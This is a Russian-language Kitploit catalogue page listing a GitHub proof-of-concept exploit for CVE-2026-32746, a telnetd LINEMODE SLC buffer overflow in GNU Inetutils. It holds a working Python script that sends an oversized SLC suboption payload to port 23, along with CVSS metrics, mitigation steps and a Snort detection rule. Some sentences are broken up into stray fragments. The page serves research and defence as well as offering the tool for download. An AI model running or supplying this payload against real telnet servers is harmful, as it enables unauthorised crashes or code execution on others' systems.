Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-32746 — # Эксплойт PoC для CVE-2026-32746 Эксплойт, подтверждающий концепцию, для CVE-2026-32746 — критической уязвимости удалённого выполнения кода в GNU Inetutils telnetd через переполнение буфера SLC в LINEMODE. Включает технический анализ, метрики CVSS и рекомендации по смягчению последствий. | Kitploit
Инструменты/GitHubGitHub/kaleth4/cve-2026-32746
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

# Эксплойт PoC для CVE-2026-32746 Эксплойт, подтверждающий концепцию, для CVE-2026-32746 — критической уязвимости удалённого выполнения кода в GNU Inetutils telnetd через переполнение буфера SLC в LINEMODE. Включает технический анализ, метрики CVSS и рекомендации по смягчению последствий.

Поделиться

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 Резюме

Критическая уязвимость | CVSS 9.8 | Удалённое выполнение кода! Затрагивает: GNU Inetutils Telnetd (версии до 2.7) Тип: OOB Write в обработчике подопций LINEMODE SLC Вектор атаки: Сеть (порт 23) | Аутентификация не требуется Воздействие: RCE с привилегиями процесса Telnetd


🎯 📖 Техническое описание

Обнаружено переполнение буфера с записью за пределами границ (OOB Write) в функции add_slc демона telnetd из . Эта ошибка позволяет удалённому атакующему путём манипуляции протокола Telnet.

GNU Inetutils
внедрять произвольный код
подопциями SLC (Set Local Characters)

🔍 Ключевые детали

  • Уязвимая функция: add_slc (обработка локальных символов).
  • Корневая причина: Отсутствие проверки границ во внутреннем буфере.
  • Эксплуатация: Массовая отправка вредоносных последовательностей LINEMODE SLC.
  • Требования: Отсутствуют (прямой доступ к порту 23).

🛠️ 💻 Proof of Concept (PoC)

Атакующий может эксплуатировать эту уязвимость с помощью вредоносного Telnet-пейлоада, который переполняет внутренний буфер:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetición de 600 veces

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregado. Verificando caída del servicio/RCE...")

⚠️ ПРЕДУПРЕЖДЕНИЕ! Этот код предназначен только для образовательных и исследовательских целей. Его использование в системах без авторизации незаконно.


📊 📈 Метрики риска (CVSS 3.1)

МетрикаЗначениеОписание
ВекторAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HУдалённо, без аутентификации
Оценка9.8 (КРИТИЧЕСКИЙ) 🔴Высокое воздействие на конфиденциальность, целостность и доступность
Публикация13 марта 2026 г.Последнее изменение: 5 мая 2026 г.

🛡️ 🔒 Смягчение и решения

🚀 Немедленное решение

✅ Обновить GNU Inetutils до исправленной версии (post-2.7).

⚡ Обходные меры

🔹 Отключить telnetd и перейти на SSH (рекомендуется). 🔹 Заблокировать порт 23 на периметральных межсетевых экранах. 🔹 Настроить IDS/IPS для обнаружения аномальных последовательностей LINEMODE SLC.

🛡️ Дополнительная конфигурация безопасности

  • Правила Snort/Suricata:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
Скачать инструмент